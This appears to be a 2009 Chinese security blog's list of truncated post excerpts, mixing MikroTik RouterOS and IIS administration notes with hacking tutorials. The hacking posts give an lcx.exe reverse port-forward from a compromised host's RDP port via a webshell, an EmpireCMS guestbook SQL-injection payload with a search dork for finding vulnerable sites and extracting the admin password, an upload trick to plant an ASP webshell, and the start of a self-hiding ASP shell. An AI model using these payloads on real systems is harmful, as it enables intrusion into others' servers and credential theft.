2009年6月30日
/ ip fir fil pr
Flags: X - disabled, I - invalid, D - dynamic
0 chain=forward content=xxx.mmma.biz action=drop
1 chain=forward content=byna.org action=drop
...
Tags:
2009年6月29日
查看内存及CUP使用情况:/ system resource monitor
查看当前所有网络连接:/ ip firewall connection print
重新启动路由:/ system reboot
路由关机:/ system shutdown
恢复默认安装:/ system reset
查看系统时间:/ system clock print
查看系统常规信息:/ system resource print
查看PC信息:/ system resource pci print
查看等级以及许可:/ system license print
...
Tags:
2009年6月27日
首先下载lcx.exe 比如放在到D盘下面。在CMD下进入到D盘,然后输入[CODE_LITE]lcx -listen 51 3389[/CODE_LITE](注意了这里51为本机的端口,3389为肉鸡上的端口)[IMG]upload/2009/6/200906271841483767.jpg[/IMG]
上面的图片开始监听端口,等待内网的3389反响连接。
打开WEBSHELL然后然后在CMD里面运行[CODE_LITE]d:\lcx -slave 211.211.21.21 3030 172.16.32.153 80 [/CODE_LITE](注意:211.211.21.21为本机的IP 172.16.32.153 为肉鸡的内网IP)
...
Tags:
2009年6月27日
配置站点的时候发现只要给数据库里面写文件就报错。
Execute Access Denied
This Virtual Directory does not allow objects to be executed.
报告这个错误,在网上翻阅资料,有的说是没有写入的权限,有的说没有执行的权限,还有的说启用父路径!后来才发现原来是在扩展里面限制动作为:GET, POST两种,应该加入成GET, HEAD, POST, TRACE这样就OK了!
[IMG]upload/2009/6/200906271403445666.jpg[/IMG]...
Tags:
2009年6月26日
[IMG]upload/2009/6/200906261045038508.jpg[/IMG] [IMG]upload/2009/6/200906261045392635.jpg[/IMG]
Tags:
2009年6月25日
安装完成后什么都没有设置的情况下.
登录
用户: admin
密码: 为空
查看已安装的网卡
>/int
>pri
现在我们来配置网卡
输入“setup”,其实RouterOS任何指令你都可以缩写成头三个字母,例如
你只需要输入“set”就可以了。
setup的菜单很简单
r - reset
l - load驱动
a - 配置网卡
d - 配置DHCP客户端
s - 配置DHCP服务端
p - 配置pppoe
t - 配置pptp
x - 退出菜单
如果你发现你配置错了,就用 set - r,或者“reset”。
...
Tags:
2009年6月15日
帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1
然后在姓名处填: [CODE_LITE]縗\ 注意当縗\不给用时可以使用%df\替代[/CODE_LITE]
然后在联系邮箱处填[CODE_LITE],1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*[/CODE_LITE]
...
Tags:
2009年6月15日
记录一下,在次感谢樱木花道指导。直接开始。先看下面的界面
[IMG]upload/2009/6/200906151155073553.jpg[/IMG]
然后先抓包分析出来uploadPic.inc.asp的路径,然后在uploadPic.inc.asp目录下输入uploadPic.asp?actionType=mod&picName=new.asp 接着开始上传张GIF格式的ASP马!上传完毕后不会返回任何信息,看下源代码里面有句
[CODE_LITE] //返回值
returnStr += "../../UploadFiles/"+document.all("imageFileName").value;[/CODE_LITE]接着就输入
...
Tags:
2009年6月13日
[CODE_LITE]<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件
' 通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24 write by skyfire
response.write "
Tags: